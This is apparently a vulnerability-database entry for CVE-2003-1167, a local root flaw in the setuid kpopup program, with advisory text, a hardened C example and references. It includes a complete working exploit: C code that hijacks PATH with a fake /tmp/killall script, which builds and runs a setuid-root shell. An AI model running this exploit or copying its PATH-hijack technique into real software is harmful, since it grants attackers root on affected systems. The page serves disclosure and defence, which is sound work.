kpopup insecure system() call arbitrary command execution vulnerability

Vulnerability ID: 1107551
Vulnerability type: Other
Published: 2003-10-28
Updated: 2005-10-20
CVE ID: CVE-2003-1167
CNNVD ID: CNNVD-200312-362
Platform: Linux
CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/23308
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-362
|Details
Kpopup is a KDE program for sending and receiving MS Windows WinPopup messages. Kpopup uses the insecure system(3) call to invoke external tools, and a local attacker can exploit this to execute arbitrary commands on the system with root privileges. Kpopup invokes the killall(1) program through an insecure use of system() that relies on the PATH environment variable; if that environment variable is set when Kpopup is executed, a malicious, forged killall(1) program may be run instead. Many current shells block the use of these functions by setuid/setgid processes and drop privileges if the effective ids do not match the process's real uid/gid. Kpopup most likely sets its real uid and gid to 0 before calling system(), which is what makes the issue exploitable.
|Exploit
source: http://www.securityfocus.com/bid/8915/info

It has been alleged that it is possible for local attackers to gain root privileges through kpopup, which is installed setuid root by default. According to the report, kpopup uses the system(3) C-library function insecurely to run other utilities on the system. In at least one instance, system(3) is called to invoke the binary killall(1) in a manner relying on the PATH environment variable. As the environment can be set by the unprivileged user when kpopup is executed, an arbitrary executable with the filename killall(1) can be executed. Many modern shells anticipate insecure use of this function by setuid/setgid processes and drop effective privileges if they do not match the real userid/gid of the process. It may be the case that kpopup first sets its real uid and gid to 0 before calling system, making this vulnerability exploitable. This has not been confirmed by Symantec.

/*Local root exploit for kpopup
 *by b0f www.b0f.net
 */
#include <stdio.h>
#include <stdlib.h>   /* putenv(), system() */
int main()
{
/* putenv() takes a single "NAME=value" string; /tmp is placed first so that
 * kpopup's PATH-based lookup of killall resolves to /tmp/killall. */
putenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:"
       "/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:");
FILE *fd;
fd = fopen("/tmp/killall", "w");
if (fd == NULL)
    return 1;
/* The fake killall is a shell script that builds and runs a setuid shell. */
fprintf(fd, "#!/bin/sh\n");
fprintf(fd, "cd /tmp\n");
fprintf(fd, "/bin/cat > shell.c << EOF\n");
fprintf(fd, "#include <stdio.h>\n");
fprintf(fd, "int main()\n");
fprintf(fd, "{\n");
fprintf(fd, "setuid(0);\n");
fprintf(fd, "setgid(0);\n");
fprintf(fd, "execl(\"/bin/bash\", \"-bash\", NULL);\n");
fprintf(fd, "return 0;\n");
fprintf(fd, "}\n");
fprintf(fd, "EOF\n");
fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shell\n");
fprintf(fd, "/bin/chown root.root /tmp/shell\n");
fprintf(fd, "/bin/chmod 6711 /tmp/shell\n");
fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELL\n");
fprintf(fd, "/tmp/shell\n");
fclose(fd);
system("chmod +x /tmp/killall");
system("/usr/local/kde/bin/kpopup root shell");
return 0;
}
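The root cause above (a setuid root program calling system("killall ...") with the caller's PATH still in effect) has a well-known hardened counterpart. The following C program is an added example written for this page; it is not kpopup's code and not part of the advisory. It checks whether the inherited PATH contains only trusted system directories, validates the process name before it is used as an argument, and runs the tool by absolute path through fork/execve with a fixed environment instead of system(). The function names, the directory allowlist and the /usr/bin/killall location are assumptions made for the example.

```c
/* Hardened pattern for a setuid helper that must run an external tool.
 * Constructed example: not kpopup's source and not an official fix. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The vulnerable pattern the advisory describes, shown only as a comment:
 *     system("killall kpopup");   // resolved through attacker-controlled PATH
 * Everything below avoids both the shell and the PATH lookup. */

/* Fixed PATH a setuid program installs instead of trusting the caller's. */
#define SAFE_PATH "/usr/sbin:/usr/bin:/sbin:/bin"
/* Absolute location of the tool (assumed for this example). */
#define KILLALL_PATH "/usr/bin/killall"

/* Directories accepted in an inherited PATH (assumed allowlist). */
static const char *const trusted_dirs[] = {
    "/bin", "/sbin", "/usr/bin", "/usr/sbin",
    "/usr/local/bin", "/usr/local/sbin", NULL
};

static int dir_is_trusted(const char *dir, size_t len)
{
    for (int i = 0; trusted_dirs[i] != NULL; i++)
        if (strlen(trusted_dirs[i]) == len && memcmp(trusted_dirs[i], dir, len) == 0)
            return 1;
    return 0;
}

/* Returns 1 if every PATH entry is absolute and in the allowlist, else 0.
 * An empty entry ("" or a trailing ':') means "current directory" and is rejected,
 * as is any writable location such as /tmp. */
int path_is_trusted(const char *path)
{
    if (path == NULL || *path == '\0')
        return 0;
    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t len = sep ? (size_t)(sep - p) : strlen(p);
        if (len == 0 || p[0] != '/' || !dir_is_trusted(p, len))
            return 0;
        if (sep == NULL)
            return 1;
        p = sep + 1;
    }
}

/* Returns 1 if the name is safe to pass as an argument: non-empty, shorter than
 * 64 bytes, only [A-Za-z0-9._-], and not starting with '-' (would parse as an option). */
int procname_is_safe(const char *name)
{
    if (name == NULL || *name == '\0' || *name == '-' || strlen(name) >= 64)
        return 0;
    for (const char *c = name; *c != '\0'; c++)
        if (!isalnum((unsigned char)*c) && *c != '.' && *c != '_' && *c != '-')
            return 0;
    return 1;
}

/* Runs KILLALL_PATH on the named process with a scrubbed environment and no shell.
 * Returns the child's exit status, or -1 if the name is rejected or spawning fails.
 * Root is dropped to the real uid/gid before exec; a tool that genuinely needs
 * root would keep it, but still exec by absolute path with a fixed environment. */
int run_killall(const char *name)
{
    if (!procname_is_safe(name))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "killall", (char *)name, NULL };
        char *const envp[] = { "PATH=" SAFE_PATH, NULL };
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(127);
        execve(KILLALL_PATH, argv, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    printf("inherited PATH trusted: %s\n",
           path_is_trusted(getenv("PATH")) ? "yes" : "no");
    if (argc > 1)
        printf("killall exit status: %d\n", run_killall(argv[1]));
    return 0;
}
```

Run it with no arguments to see whether the current shell's PATH would have passed the check; with a process name it invokes /usr/bin/killall the safe way and reports its exit status. The two validation functions are the part worth reusing: a PATH that contains /tmp, a relative entry or a trailing colon fails path_is_trusted(), and a name with shell metacharacters or a leading '-' fails procname_is_safe() before it ever reaches an exec.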
|References

Source: BID
Name: 8915
Link: http://www.securityfocus.com/bid/8915
Source: OSVDB
Name: 2742
Link: http://www.osvdb.org/2742
Source: SECUNIA
Name: 10105
Link: http://secunia.com/advisories/10105
Source: XF
Name: kpopup-systemcall-execute-code(13540)
Link: http://xforce.iss.net/xforce/xfdb/13540
Source: BUGTRAQ
Name: 20031028 Local root vuln in kpopup
Link: http://www.securityfocus.com/archive/1/342736
Source: NSFOCUS
Name: 5600
Link: http://www.nsfocus.net/vulndb/5600
